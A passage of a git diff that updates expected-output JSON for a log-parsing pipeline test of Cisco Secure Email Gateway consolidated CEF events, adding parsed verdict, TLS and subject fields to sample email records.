'http://druseidt.de/englisch/messen/messen.html': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafce9df9b86e788cce7959f98ce975c0dfc316987fe80c3c8dd6bf4adf9815d4297b04cdb2e0a678c7caf598e8cf298edb': {'WbrsScore': 3.0}} diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log-expected.json index bf784b619dc..96e9025dc6b 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log-expected.json @@ -1115,6 +1115,10 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "NEGATIVE", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "NO_MATCH", "delivery_connection_id": "3036000", "dkim_verdict": "pass", "dlp_verdict": "NOT_EVALUATED", @@ -1141,7 +1145,7 @@ "out": { "cipher": "ECDHE-RSA-AES256-GCM-SHA384", "connection_status": "Success", - "protocol": "TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH" + "protocol": "TLSv1.2" } } }, @@ -1231,7 +1235,11 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "FA_PENDING", + "as_verdict": "NEGATIVE", "attachment_details": "{'meeting.ics': {'AMP': {'Verdict': 'FILE UNKNOWN', 'fileHash': '17ae79446b4ec3baf161704831970aac49457d32935c6383c2a45aed136a99df'}, 'BodyScanner': {}}}", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "MATCH", "dlp_verdict": "NOT_EVALUATED", "final_action_details": "Message held temporarily in Delay Quarantine", "friendly_from": "River ", @@ -1246,7 +1254,14 @@ "msg_size": 18675, "outbreak_filter_verdict": "NEGATIVE", "sdr_consolidated_domain_age": "30 days (or greater)", - "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'river@this.example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@vm-lion.dmz'}}" + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'river@this.example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@vm-lion.dmz'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + } }, "event": { "name": "Consolidated Log Event" @@ -1255,7 +1270,7 @@ "listener": { "name": "IncomingMail" }, - "message": "'Accept: Cisco - SOLUTIONS' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=FA_PENDING ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH" + "message": "CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=E7DEF468022C4EB09683-9A331A42E1F7 ESAMID=54376810 ESAICID=43587623 endTime=Tue Jul 4 06:21:54 2023 ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAAttachmentDetails={'meeting.ics': {'AMP': {'Verdict': 'FILE UNKNOWN', 'fileHash': '17ae79446b4ec3baf161704831970aac49457d32935c6383c2a45aed136a99df'}, 'BodyScanner': {}}} ESAFriendlyFrom=River ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 16:12:44 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=river@this.example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=New Zealand ESAMFVerdict=MATCH act=DQ ESAFinalActionDetails=Message held temporarily in Delay Quarantine cs4Label=ExternalMsgID cs4='<2403354681.734500.1688449973515.mail.lion@example.com>' ESAMsgSize=18675 ESAOFVerdict=NEGATIVE duser=smith@example.com ESAHeloDomain=vm-lion.dmz ESAHeloIP=89.160.20.128 cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'river@this.example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@vm-lion.dmz'}} sourceHostName=company.example.com sourceAddress=89.160.20.128 msg='Accept: Cisco - SOLUTIONS' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=FA_PENDING ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH" } }, "ecs": { @@ -1268,6 +1283,7 @@ ] }, "message_id": "54376810", + "subject": "Accept: Cisco - SOLUTIONS", "to": { "address": [ "smith@example.com" @@ -1335,6 +1351,10 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "SUSPECT", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "MATCH", "delivery_connection_id": "34809573", "dkim_verdict": "pass", "dlp_verdict": "NOT_EVALUATED", @@ -1352,7 +1372,14 @@ "outbreak_filter_verdict": "NEGATIVE", "sdr_consolidated_domain_age": "30 days (or greater)", "sender_group": "ACCEPTLIST", - "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'irobot@example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@mail-q6by9-a42.google.com'}}" + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'irobot@example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@mail-q6by9-a42.google.com'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + } }, "event": { "name": "Consolidated Log Event" @@ -1361,7 +1388,7 @@ "listener": { "name": "IncomingMail" }, - "message": "'IE : Crayons' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH" + "message": "CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=30543A3AB9E54FA8AAC1-FB812C95028D ESAMID=238746 ESAICID=435897324 ESADCID=34809573 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.142 ESAFriendlyFrom=Will ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 15:14:29 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=irobot@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=United States ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='' ESAMsgSize=12312 ESAOFVerdict=NEGATIVE duser=alfombra@example.com ESAHeloDomain=mail-q6by9-a42.google.com ESAHeloIP=81.2.69.192 cfp1Label=SBRSScore cfp1=2.7 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'irobot@example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@mail-q6by9-a42.google.com'}} sourceHostName=mail-q6by9-a42.google.com ESASenderGroup=ACCEPTLIST sourceAddress=81.2.69.192 msg='IE : Crayons' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH" } }, "ecs": { @@ -1374,6 +1401,7 @@ ] }, "message_id": "238746", + "subject": "IE : Crayons", "to": { "address": [ "alfombra@example.com" @@ -1440,6 +1468,127 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "SUSPECT", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "NO_MATCH", + "delivery_connection_id": "970897", + "dkim_verdict": "pass", + "dlp_verdict": "NOT_EVALUATED", + "final_action_details": "To SPAM", + "friendly_from": "Beaches ", + "graymail_verdict": "NEGATIVE", + "helo": { + "domain": "example.com", + "ip": "89.160.20.112" + }, + "injection_connection_id": "35635425", + "mail_flow_policy": "ACCEPT", + "mf_verdict": "MATCH", + "msg_size": 20668, + "outbreak_filter_verdict": "NEGATIVE", + "reply_to": "lane@example.com", + "sdr_consolidated_domain_age": "30 days (or greater)", + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + } + }, + "event": { + "name": "Consolidated Log Event" + }, + "event_class_id": "ESA_CONSOLIDATED_LOG_EVENT", + "listener": { + "name": "IncomingMail" + }, + "message": "CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH" + } + }, + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "westinghouse-thoreau\\\\=example.com@example.com" + ] + }, + "message_id": "786324", + "subject": "Totally not suspicious email subject", + "to": { + "address": [ + "thoreau@example.com" + ] + } + }, + "event": { + "end": "2023-07-04T06:21:54.000Z", + "kind": "event", + "original": "<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH", + "severity": "5", + "start": "2023-07-04T14:42:34.000Z", + "timezone": "UTC" + }, + "host": { + "id": "4FEF3A4372664BCCB404-20EE1767D434" + }, + "log": { + "syslog": { + "priority": 14 + } + }, + "related": { + "ip": [ + "89.160.20.112", + "81.2.69.144" + ] + }, + "source": { + "domain": "example.com", + "ip": "89.160.20.112" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-07-04T06:21:54.000Z", + "cisco_secure_email_gateway": { + "log": { + "act": "QUARANTINED", + "appliance": { + "product": "C100V Email Security Virtual Appliance", + "vendor": "Cisco", + "version": "14.3.0-032" + }, + "category": { + "name": "consolidated_event" + }, + "cef_format_version": "0", + "cfp1_label": "SBRSScore", + "cs1": "DEFAULT", + "cs1_label": "MailPolicy", + "cs2": "NZ", + "cs2_label": "SenderCountry", + "cs3": "N/A", + "cs3_label": "SDRThreatCategory", + "cs4": "490b2a15fa4742331779cdaa4e@example.com", + "cs4_label": "ExternalMsgID", + "cs6": "Neutral", + "cs6_label": "SDRRepScore", + "data": { + "ip": "81.2.69.144" + }, + "device_direction": "incoming", + "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "SUSPECT", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "NO_MATCH", "delivery_connection_id": "970897", "dkim_verdict": "pass", "dlp_verdict": "NOT_EVALUATED", @@ -1457,16 +1606,24 @@ "outbreak_filter_verdict": "NEGATIVE", "reply_to": "lane@example.com", "sdr_consolidated_domain_age": "30 days (or greater)", - "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}}" + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + } }, "event": { "name": "Consolidated Log Event" }, "event_class_id": "ESA_CONSOLIDATED_LOG_EVENT", + "host": "test.hostname.co", "listener": { "name": "IncomingMail" }, - "message": "\\\"Totally not suspicious email subject\\\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH" + "message": "CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH" } }, "ecs": { @@ -1479,6 +1636,7 @@ ] }, "message_id": "786324", + "subject": "Totally not suspicious email subject", "to": { "address": [ "thoreau@example.com" @@ -1488,7 +1646,7 @@ "event": { "end": "2023-07-04T06:21:54.000Z", "kind": "event", - "original": "<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\\\"Totally not suspicious email subject\\\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH", + "original": "<14>Jul 04 06:21:54 test.hostname.co consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH", "severity": "5", "start": "2023-07-04T14:42:34.000Z", "timezone": "UTC" @@ -1537,7 +1695,7 @@ "cs2_label": "SenderCountry", "cs3": "N/A", "cs3_label": "SDRThreatCategory", - "cs4_label": "ExternalMsgID cs4=''", + "cs4_label": "ExternalMsgID", "cs6": "Favorable", "cs6_label": "SDRRepScore", "data": { @@ -1545,6 +1703,10 @@ }, "device_direction": "incoming", "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "NEGATIVE", + "av_verdict": "NEGATIVE", + "content_filter_verdict": "NOT_EVALUATED", "delivery_connection_id": "23876232", "dkim_verdict": "pass", "dlp_verdict": "NOT_EVALUATED", @@ -1571,7 +1733,7 @@ "out": { "cipher": "ECDHE-RSA-AES256-GCM-SHA384", "connection_status": "Success", - "protocol": "TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=NEGATIVE ESAAVVerdict=NEGATIVE ESACFVerdict=NOT_EVALUATED" + "protocol": "TLSv1.2" } } }, @@ -1766,6 +1928,249 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2024-07-04T06:21:54.000Z", + "cisco_secure_email_gateway": { + "log": { + "act": "DELIVERED", + "appliance": { + "product": "C100V Secure Email Gateway Virtual", + "vendor": "Cisco", + "version": "15.0.1-030" + }, + "category": { + "name": "consolidated_event" + }, + "cef_format_version": "0", + "cfp1_label": "SBRSScore", + "cs1": "DEFAULT", + "cs1_label": "MailPolicy", + "cs2": "not enabled", + "cs2_label": "SenderCountry", + "cs4": "AS8PR07MB7750BD7C13A560C44183D3158A5F2@AS8PR07MB7750.eurprd07.prod.outlook.com", + "cs4_label": "ExternalMsgID", + "data": { + "ip": "81.2.69.144" + }, + "device_direction": "outgoing", + "esa": { + "amp_verdict": "NOT_EVALUATED", + "as_verdict": "NOT_EVALUATED", + "attachment_details": "{'image.png': {'BodyScanner': {}}, 'GO EYEWEAR v4.pdf': {'BodyScanner': {}}}", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "MATCH", + "delivery_connection_id": "1980231", + "dlp_verdict": "NO_TRIGGER", + "friendly_from": "Carlos Alberto Cueto ", + "graymail_verdict": "NOT_EVALUATED", + "helo": { + "domain": "EUR05-DB8-obe.outbound.protection.outlook.com", + "ip": "1.128.3.4" + }, + "injection_connection_id": "6274404", + "mail_flow_policy": "RELAY", + "mf_verdict": "MATCH", + "msg_size": 2380198, + "outbreak_filter_verdict": "NOT_EVALUATED", + "sender_group": "RELAY_O365", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + }, + "out": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + }, + "url_details": "{'https://www.client.test/': {'WbrsScore': 3.0}, 'https://www.client.test/siente-la-inspiracion': {'WbrsScore': 3.0}, 'http://www.client.test/': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}, 'www.client.test': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}}" + }, + "event": { + "name": "Consolidated Log Event" + }, + "event_class_id": "ESA_CONSOLIDATED_LOG_EVENT", + "listener": { + "name": "MailFlow-Ext" + }, + "message": "CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873886 ESAICID=6274404 ESADCID=1980231 ESAAMPVerdict=NOT_EVALUATED ESAASVerdict=NOT_EVALUATED ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:30 2024 ESADLPVerdict=NO_TRIGGER dvc=81.2.69.144 ESAAttachmentDetails={'image.png': {'BodyScanner': {}}, 'GO EYEWEAR v4.pdf': {'BodyScanner': {}}} ESAFriendlyFrom=Carlos Alberto Cueto ESAGMVerdict=NOT_EVALUATED start=Thu Feb 29 13:24:27 2024 deviceOutboundInterface=MailFlow-Ext deviceDirection=1 ESAMailFlowPolicy=RELAY suser=lclient17@externos.client.test cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=not enabled ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=2380198 ESAOFVerdict=NOT_EVALUATED duser=teresa.faria@goeyeweargroup.com ESAHeloDomain=EUR05-DB8-obe.outbound.protection.outlook.com ESAHeloIP=1.128.3.4 cfp1Label=SBRSScore cfp1=not enabled shost=mail-db8eur05lp2105.outbound.protection.outlook.com ESASenderGroup=RELAY_O365 src=216.160.83.56 msg='Presupuesto Go Eyewear' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'https://www.client.test/': {'WbrsScore': 3.0}, 'https://www.client.test/siente-la-inspiracion': {'WbrsScore': 3.0}, 'http://www.client.test/': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}, 'www.client.test': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}}" + } + }, + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "lclient17@externos.client.test" + ] + }, + "message_id": "17873886", + "subject": "Presupuesto Go Eyewear", + "to": { + "address": [ + "teresa.faria@goeyeweargroup.com" + ] + } + }, + "event": { + "end": "2024-02-29T13:24:30.000Z", + "kind": "event", + "original": "<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873886 ESAICID=6274404 ESADCID=1980231 ESAAMPVerdict=NOT_EVALUATED ESAASVerdict=NOT_EVALUATED ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:30 2024 ESADLPVerdict=NO_TRIGGER dvc=81.2.69.144 ESAAttachmentDetails={'image.png': {'BodyScanner': {}}, 'GO EYEWEAR v4.pdf': {'BodyScanner': {}}} ESAFriendlyFrom=Carlos Alberto Cueto ESAGMVerdict=NOT_EVALUATED start=Thu Feb 29 13:24:27 2024 deviceOutboundInterface=MailFlow-Ext deviceDirection=1 ESAMailFlowPolicy=RELAY suser=lclient17@externos.client.test cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=not enabled ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=2380198 ESAOFVerdict=NOT_EVALUATED duser=teresa.faria@goeyeweargroup.com ESAHeloDomain=EUR05-DB8-obe.outbound.protection.outlook.com ESAHeloIP=1.128.3.4 cfp1Label=SBRSScore cfp1=not enabled shost=mail-db8eur05lp2105.outbound.protection.outlook.com ESASenderGroup=RELAY_O365 src=216.160.83.56 msg='Presupuesto Go Eyewear' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'https://www.client.test/': {'WbrsScore': 3.0}, 'https://www.client.test/siente-la-inspiracion': {'WbrsScore': 3.0}, 'http://www.client.test/': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}, 'www.client.test': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}}", + "severity": "5", + "start": "2024-02-29T13:24:27.000Z", + "timezone": "UTC" + }, + "host": { + "id": "4235AF15AF7E90350F1D-F01741F5D5BE" + }, + "log": { + "syslog": { + "priority": 14 + } + }, + "related": { + "ip": [ + "1.128.3.4", + "81.2.69.144", + "216.160.83.56" + ] + }, + "source": { + "domain": "mail-db8eur05lp2105.outbound.protection.outlook.com", + "ip": "216.160.83.56" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-07-04T06:21:54.000Z", + 